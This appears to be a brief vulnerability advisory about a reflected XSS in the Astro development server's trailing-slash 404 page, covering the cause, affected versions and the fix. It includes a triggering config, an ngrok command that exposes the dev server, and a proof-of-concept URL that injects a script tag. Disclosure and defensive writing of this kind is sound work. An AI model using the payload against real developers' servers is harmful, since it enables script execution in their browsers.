The vulnerability exists in the Astro development server’s 404 error page for trailing slash mismatches. The `corrected` variable, derived from the user-controlled URL pathname, is inserted into the HTML without sanitization. While the original `pathname` is escaped, the `corrected` version is not. This allows an attacker to craft a URL containing a malicious script. When a developer with a misconfigured trailing slash visits this URL, the server returns a 404 page that unsafely interpolates the payload, causing script execution in the developer’s browser context.
Platform: Astro
Version: <5.16.0
Vulnerability: Reflected XSS
Severity: Medium
Date: 2024-12-18
Prediction: Patch 2024-12-20
What Undercode Says:
npm run dev
ngrok http 3000

// astro.config.mjs (trailing-slash setting that triggers the mismatch 404 page)
import { defineConfig } from 'astro/config';

export default defineConfig({
  trailingSlash: 'never',
});

// Malicious URL
http://localhost:3000/"></script><script>alert(1)</script><!--
How to Exploit:
Craft malicious URL with XSS payload targeting the `corrected` variable in the 404 page.
Protection from this CVE
Update Astro to version >=5.16.0. Do not expose the development server to untrusted networks.
Impact:
Arbitrary JavaScript execution in developer’s browser, potential session hijacking, local network probing.
Sources:
Reported By: github.com